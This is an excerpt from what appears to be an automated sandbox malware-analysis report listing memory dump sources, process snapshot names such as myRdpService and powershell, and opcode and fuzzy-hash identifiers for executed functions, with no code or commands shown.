                                                                                      • Associated: 0000002B.00000002.8191445038.00007FF68BBF3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8191445038.00007FF68BBF5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8191701011.00007FF68BBF8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_43_2_7ff68b170000_myRdpService.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                      • Instruction ID: 8fc8fd48bed2a52b37f85e8c56c253e988bee12feb0851a1c666ca42ce8ca9f7
                                                                                      • Opcode Fuzzy Hash: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                      • Instruction Fuzzy Hash: 7A111526B14F02CAEB409B60EC542B833A4FB1DB59F441E39EA6D86BA5DF7CD194C340

                                                                                      Executed Functions

                                                                                      Function 00007FF95A2833B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000002C.00000002.8180298827.00007FF95A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A280000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_44_2_7ff95a280000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab133de89e99e409522d923d3be1d99cae334341430f90da174e7b8153fc8aaf
                                                                                      • Instruction ID: 1a95d5bb04cce82493dc2adc58c8f780f3f6ece99c634f3c92b7cfbcc39046ce
                                                                                      • Opcode Fuzzy Hash: ab133de89e99e409522d923d3be1d99cae334341430f90da174e7b8153fc8aaf
                                                                                      • Instruction Fuzzy Hash: EB01447111CB0D8FD744EF0CE451AA5B7E0FB95324F10056DE58AC3651DA36E882CB46